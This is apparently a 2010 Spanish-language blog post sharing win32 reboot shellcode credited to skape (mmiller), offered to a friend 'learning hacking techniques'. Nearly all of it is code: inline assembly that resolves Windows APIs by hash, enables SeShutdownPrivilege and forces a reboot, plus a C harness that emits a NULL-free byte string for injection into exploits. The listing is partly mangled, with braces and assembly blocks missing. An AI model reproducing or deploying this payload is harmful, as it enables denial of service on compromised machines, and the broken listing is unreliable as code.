lunes, 27 de septiembre de 2010


Saludos Mundo Libre he aqui un codigo para mi amigo raf_jup que esta aprendiendo las tecnicas de hacking.

* Generic reboot shellcode for win32
* Targets:
* 95/98/ME/NT/2K/XP
* Usage:
* $ reboot.exe
* Usage: reboot.exe [test | cstyle]
* To generate usable code:
* $ reboot.exe cstyle
* To test the code:
* $ reboot.exe test
* Your machine should reboot.
* Features/Quirks:
* * No NULLs.
* * This cannot be tested from the Windows 95/98/ME command line.
* For more information, read the ExitWindowsEx documentation
* in the Platform SDK.
* References:
* * PEB lookup based largely on Dino Dai Zovi's peb resolver.
* Disclaimer:
* The author cannot be held responsible for how this code is used.
* Compile:
* cl reboot.c /link /debug
* skape
* Technical notes
* Hash calculations:
* kernel32
* LoadLibraryA -> ec0e4e8e
* GetCurrentProcess -> 7b8f17e6
* ExitProcess -> 73e2d87e
* user32
* ExitWindowsEx -> 89dabef5
* advapi32
* OpenProcessToken -> 591ea70f
* LookupPrivilegeValue -> 97e8c2a2
* AdjustTokenPrivileges -> 24488a0f
* ebp+0x10 -> LoadLibraryA
* ebp+0x14 -> GetCurrentProcess
* ebp+0x18 -> ExitWindowsEx
* ebp+0x1c -> ExitProcess
* ebp+0x20 -> OpenProcessToken
* ebp+0x24 -> LookupPrivilegeValue
* ebp+0x28 -> AdjustTokenPrivileges
* ebp+0x30 -> token handle

#pragma warning(disable: 4068)

void __declspec(naked) reboot_begin()
jmp startup

#include "generic.c"

sub esp, 0x60 // Give us some room to work.
mov ebp, esp // Use ebp as our frame pointer.

call find_kernel32 // Find the base address of kernel32.dll
mov edi, eax // Save it in edi

jmp shorten_find_function_bnc // Jump to the bounce point
pop eax // Pop the return address
sub eax, 0x6a // offset from shorten_find_function_end to find_function
mov [ebp + 0x04], eax // Save the absolute address in ebp+0x04
jmp shorten_find_function_end // Jump to the end
call shorten_find_function_rel // Call back to relative to get our VMA
mov esi, [ebp + 0x04] // Shortcut find_function in esi

resolve_symbols_kernel32: // edi -> kernel32.dll base
// LoadLibraryA
push 0xec0e4e8e
push edi
call esi
mov [ebp + 0x10], eax

// GetCurrentProcess
push 0x7b8f17e6
push edi
call esi
mov [ebp + 0x14], eax

// ExitProcess
push 0x73e2d87e
push edi
call esi
mov [ebp + 0x1c], eax

resolve_symbols_user32: // edi -> user32.dll base
xor eax, eax
mov ax, 0x3233
push eax
push 0x72657375
push esp // Pointer to 'user32'
call [ebp + 0x10] // Call LoadLibraryA
mov edi, eax

// ExitWindowsEx
push 0x89dabef5
push edi
call esi
mov [ebp + 0x18], eax

resolve_symbols_advapi32: // edi -> advapi32.dll base
xor eax, eax
push eax
push 0x32336970
push 0x61766461
push esp // Pointer to 'advapi32'
call [ebp + 0x10] // Call LoadLibraryA
mov edi, eax

// OpenProcessToken
push 0x591ea70f
push edi
call esi
mov [ebp + 0x20], eax

// LookupPrivilegeValueA
push 0x97e8c2a2
push edi
call esi
mov [ebp + 0x24], eax

// AdjustTokenPrivileges
push 0x24488a0f
push edi
call esi
mov [ebp + 0x28], eax

call [ebp + 0x14] // Call GetCurrentProcess
lea ebx, [ebp + 0x30] // Get the place to store our token
push ebx // Pointer to token handle
xor ecx, ecx // Zero ecx
mov cl, 0x28
push eax // Current process handle
call [ebp + 0x20] // Open our token

mov eax, 0x41656765
and eax, 0x92ffffff
push eax
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553
mov ecx, esp // Store the address of 'SeShutdownPrivilege'
sub esp, 0x14 // Allocate space for our TOKEN_PRIVILEGES struct
mov esi, esp // Save the address of our token privileges struct
lea ebx, [esi + 0x08] // Load the address of our tp.Privileges[0].Luid
push ebx // Luid pointer
push ecx // 'SeShutdownPrivilege' pointer
xor ecx, ecx // Zero ecx
push ecx // NULL
call [ebp + 0x24] // Call LookupPrivilegeValueA

xor ecx, ecx // Zero ecx
inc ecx // Inc
mov [esi + 0x04], ecx // Set tp.PrivilegeCount to 1
inc ecx // Inc
mov [esi + 0x10], ecx // Set tp.Privileges[0].Attributes to SE_PRIVILEGE_ENABLED
xor ecx, ecx // Zero ecx
push ecx // Return length
push ecx // Previous state
push ecx // Buffer length
lea ebx, [esi + 0x04] // Grab the address of our tp struct
push ebx // Our TOKEN_PRIVILEGES struct
push ecx // Disable all
push [ebp + 0x30] // Our process token
call [ebp + 0x28] // Call AdjustTokenPrivileges

xor ecx, ecx // Zero ecx
push ecx // Reason
mov cl, 0x06 // EWX_REBOOT | EWX_FORCE
push ecx // Flags
call [ebp + 0x18] // Call ExitWindowsEx

push ecx // Reason
call [ebp + 0x1c] // Call ExitProcess


void __declspec(naked) reboot_end()
__asm ret

int main(int argc, char **argv)
if (argc == 1)
fprintf(stdout, "Usage: %s [test | cstyle]\n", argv[0]);
return 0;

if (!strcmp(argv[1], "test"))
else if (!strcmp(argv[1], "cstyle"))
unsigned char *start = (unsigned char *)((unsigned char *)reboot_begin);
unsigned char *stop = (unsigned char *)((unsigned char *)reboot_end);
unsigned char *c = NULL;
unsigned long x = 0, length;

// Calculate the actual address in memory of the begin/end function based off their relative jmp points.
start += *(unsigned long *)((unsigned char *)reboot_begin + 1) + 5;
stop += *(unsigned long *)((unsigned char *)reboot_end + 1) + 5;
length = stop - start;

fprintf(stdout, "// %lu byte reboot shellcode\n\n", length);
fprintf(stdout, "unsigned char reboot[] = \"");

for (c = start;
x < length;
fprintf(stdout, "\\x%2.2x", c[x]);

fprintf(stdout, "\";\n\n");
fprintf(stdout, "%s: invalid option\n", argv[0]);

return 1;

gracias a su creador mmiller
Saludos Mundo libre.

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